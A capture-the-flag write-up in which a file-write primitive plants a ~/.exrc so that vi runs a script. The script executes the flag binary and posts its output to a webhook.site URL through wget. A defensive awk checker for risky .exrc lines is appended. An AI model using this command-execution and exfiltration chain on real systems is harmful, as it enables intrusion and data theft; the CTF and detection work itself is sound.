This challenge provides a simple app running as the non-root user patapim, with the following features:
- Write a file as non-root user
- Execute a command of 4 characters or fewer
We need to execute the command /tung tung tung tung tung sahur.
There is also a link to another task from KalmarCTF, which was the inspiration for this task.
I checked writeups for this and similar challenges and found that a couple of solutions were used:
- Write a key into .gpg and execute the gpg command, which would execute code from the pubkey
- Use w|su
The second one won’t work because there is also a check for the | character. The first one won’t work because there is no gpg in the Alpine image. The pip command is available, but it requires a couple of directories to be created, which is also impossible. So I tried to find an app that loads some config from ~/ and executes code from it. After some searching, I found that vi uses ~/.exrc, which allows executing commands. There are many ways to call the tung app using vi; here is one of them:
- Upload a script get_flag.sh which calls the tung app and sends the output to a webhook
- Upload .exrc which calls the get_flag script
- Call the vi command

Code for this solution:
curl -X POST -d "wget --post-data=\"\$(/tung tung tung tung tung sahur)\" \"https://webhook.site/00000000-0000-0000-0000-000000000000/\" -q" "http://127.0.0.1:7331/write?filename=/home/patapim/get_flag.sh"
curl -X POST -d "\!. ~/get_flag.sh" "http://127.0.0.1:7331/write?filename=/home/patapim/.exrc"
curl "http://127.0.0.1:7331/exec?cmd=vi"
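
Added example, not part of the original writeup: a defensive check for the ~/.exrc behaviour used above, listing the startup-file lines that run a shell command or load another script when vi starts. The function name exrc_findings and the sample file are constructed for illustration, and the patterns cover only the common spellings of these ex commands.

```shell
#!/bin/sh
# Added example (not from the writeup): list lines in an ex/vi startup file
# that would run a shell command or pull in another script at editor start.

exrc_findings() {
    # $1: path to a .exrc-style file. Prints "lineno:text" per risky line.
    [ -r "$1" ] || return 0
    awk '
    {
        line = $0
        sub(/\r$/, "", line)
        # ex allows several commands per line, separated by "|".
        n = split(line, parts, "|")
        for (i = 1; i <= n; i++) {
            cmd = parts[i]
            # Leading blanks and colons are ignored by ex.
            sub(/^[ \t:]*/, "", cmd)
            # A double quote starts a comment: skip the rest of the line.
            if (cmd ~ /^"/) break
            # Flag: shell escape, spawning a shell, sourcing another script,
            # and read/write through a command.
            if (cmd ~ /^!/ ||
                cmd ~ /^(sh|shell)([ \t]|$)/ ||
                cmd ~ /^(so|source)[ \t]/ ||
                cmd ~ /^(r|read|w|write)[ \t]*!/) {
                print NR ":" line
                break
            }
        }
    }' "$1"
}

# Constructed sample input; line 3 mirrors the .exrc written in the writeup.
sample=$(mktemp)
cat > "$sample" <<'EOF'
" constructed sample .exrc
set number
!. ~/get_flag.sh
  :source /tmp/other.exrc
set ai | r !id
map q :!ls
EOF

exrc_findings "$sample"
rm -f "$sample"
```

The key mapping on the last sample line is not reported, because it only runs when the key is pressed, not at startup.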